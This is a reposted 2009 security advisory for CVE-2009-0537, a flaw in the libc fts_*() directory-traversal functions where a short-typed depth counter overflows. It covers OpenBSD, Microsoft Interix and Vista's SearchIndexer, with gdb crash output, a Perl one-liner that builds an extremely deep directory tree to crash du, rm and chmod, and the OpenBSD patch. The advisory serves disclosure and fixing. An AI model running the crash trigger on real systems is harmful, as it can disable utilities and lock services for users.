fts_*():multiple vendors, Denial-of-service

2009.03.04
Risk: Medium
Local: Yes
Remote: No
CWE: CWE-189


CVSS Base Score: 4.9/10
Impact Subscore: 6.9/10
Exploitability Subscore: 3.9/10
Exploit range: Local
Attack complexity: Low
Authentication: No required
Confidentiality impact: None
Integrity impact: None
Availability impact: Complete

[fts_*():multiple vendors, Denial-of-service ] Author: Maksymilian Arciemowicz Date: - - Dis.: 21.10.2008 - - Pub.: 04.03.2009 CVE: CVE-2009-0537 We are going informing all vendors, about this problem. Affected Software (official): - - OpenBSD 4.4 /usr/src/lib/libc/gen/fts.c - - Microsoft Interix 6.0 10.0.6030.0 x86 - - Microsft Vista Enterprise SearchIndexer.exe probably more... - --- 0.Description --- The fts functions are provided for traversing UNIX file hierarchies. The fts_open() function returns a "handle" on a file hierarchy, which is then supplied to the other fts functions. The function fts_read() returns a pointer to a structure describing one of the files in the file hierarchy. The function fts_children() returns a pointer to a linked list of structures, each of which describes one of the files contained in a directory within the hierarchy. typedef struct _ftsent { unsigned short fts_info; /* flags for FTSENT structure */ char *fts_accpath; /* access path */ char *fts_path; /* root path */ size_t fts_pathlen; /* strlen(fts_path) */ char *fts_name; /* file name */ size_t fts_namelen; /* strlen(fts_name) */ short fts_level; /* depth (-1 to N) */ int fts_errno; /* file errno */ long fts_number; /* local numeric value */ void *fts_pointer; /* local address value */ struct _ftsent *fts_parent; /* parent directory */ struct _ftsent *fts_link; /* next file structure */ struct _ftsent *fts_cycle; /* cycle structure */ struct stat *fts_statp; /* stat(2) information */ } FTSENT; - --- 1. libc:fts_*():multiple vendors, Denial-of-service --- The main problem exist in fts_level from ftsent structure. Type of fts_level is short. let's see /usr/src/lib/libc/gen/fts.c (OpenBSD) - ---line-616-625--- /* * Figure out the max file name length that can be stored in the * current path -- the inner loop allocates more path as necessary. * We really wouldn't have to do the maxlen calculations here, we * could do them in fts_read before returning the path, but it's a * lot easier here since the length is part of the dirent structure. * * If not changing directories set a pointer so that can just append * each new name into the path. */ - ---line-616-625--- "We really wouldn't have to do the maxlen calculations here..." Here should be some level or pathlen monitor. Should. short fts_level; /* depth (-1 to N) */ fts_level is short type, no aleph zero - ---line-247-249--- #define NAPPEND(p) \ (p->fts_path[p->fts_pathlen - 1] == '/' \ ? p->fts_pathlen - 1 : p->fts_pathlen) - ---line-247-249--- this function will crash, when we will requests to wrong allocated memory. So, what is wrong: 127# pwd /home/cxib 127# du /home/ 4 /home/cxib/.ssh Segmentation fault (core dumped) 127# rm -rf Samotnosc Segmentation fault (core dumped) 127# chmod -R 000 Samotnosc Segmentation fault (core dumped) 127# gdb -q du (no debugging symbols found) (gdb) r /home/ Starting program: /usr/bin/du /home/ 4 /home/cxib/.ssh Program received signal SIGSEGV, Segmentation fault. 0x0b3e65c1 in fts_read (sp=0x8a1b11c0) at /usr/src/lib/libc/gen/fts.c:385 385 name: t = sp->fts_path + NAPPEND(p->fts_parent); (gdb) print p->fts_level $1 = -19001 (gdb) print p->fts_path $2 = 0x837c9000 <Address 0x837c9000 out of bounds> and we have answer. 127# cd /home/cxib 127# mkdir len 127# cd len 127# mkdir 24 127# mkdir 23 127# mkdir 22 127# cd 22 127# perl -e '$a="C"x22;for(1..50000){ ! -d $a and mkdir $a and chdir $a }' 127# du . Segmentation fault (core dumped) 127# cd ../23/ 127# perl -e '$a="C"x23;for(1..50000){ ! -d $a and mkdir $a and chdir $a }' 127# du . Segmentation fault (core dumped) 127# cd ../24/ 127# perl -e '$a="C"x24;for(1..50000){ ! -d $a and mkdir $a and chdir $a }' 127# du . /* Will print correctly output */ In all cases, the function should return an error flag "ENAMETOOLONG". The security consequences can be derived from the crash of the program. All combinations like " while ( fts_read ( ) ) " and " ftw ( ) " function, constitute a potential risk. Examples of vulnerable programs: du rm chmod -R chgrp -R In the case of Microsoft Interix, the situation is very similar. % uname -a Interix cxib-PC 6.0 10.0.6030.0 x86 Intel_x86_Family6_Model123_Stepping6 % du pa Segmentation fault Vista Enterprise does not allow for the creation of the name too long. At the same time, has great problems with the operation of such nodes. Using Interix subsystem, you can create a deep tree to the NTFS partition. example: fts_level -10000 Then, we can no longer do anything with incorrect directory from the Windows API. If you try change permissions, copy the directory, you will receive a lot of bugs (stack overflow etc.). SearchIndexer.exe will crash many times - --- Faulting application SearchIndexer.exe, version 7.0.6001.16503, time stamp 0x483b99af, faulting module msvcrt.dll, version 7.0.6001.18000, time stamp 0x4791a727, exception code 0x40000015, fault offset 0x00053adb, process id 0x364, application start time 0x01c99276bd383759. - --- In some cases, is possible to permanently lock the service. Interesting behavior we can see an example C:\Users\cxib\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\Not_existed_node\ (try put this path into explorer) where C:\Users\cxib\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\ of course exists We do not see the potential risk, but the algorithm should be changed. We publish this note, because the vulnerability was only tested for OpenBSD. Many other systems, reacts strangely to the potential testing. - --- 2. Fix --- http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gen/fts.c Fix by Otto Moerbeek: Index: fts.c =================================================================== RCS file: /cvs/src/lib/libc/gen/fts.c,v retrieving revision 1.41 diff -u -p -r1.41 fts.c - --- fts.c 27 Dec 2008 12:30:13 -0000 1.41 +++ fts.c 10 Feb 2009 09:00:24 -0000 @@ -633,6 +633,14 @@ fts_build(FTS *sp, int type) len++; maxlen = sp->fts_pathlen - len; + if (cur->fts_level == SHRT_MAX) { + (void)closedir(dirp); + cur->fts_info = FTS_ERR; + SET(FTS_STOP); + errno = ENAMETOOLONG; + return (NULL); + } + level = cur->fts_level + 1; /* Read the directory, attaching each entry to the `link' pointer. */ - --- 3. Contact --- Author: Maksymilian Arciemowicz

References:

http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gen/fts.c
ttp://www.securitytracker.com/id?1021818
http://www.securityfocus.com/bid/34008
http://www.securityfocus.com/archive/1/archive/1/501505/100/0/threaded
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gen/fts.c.diff?r1=1.41;r2=1.42;f=h
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gen/fts.c


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top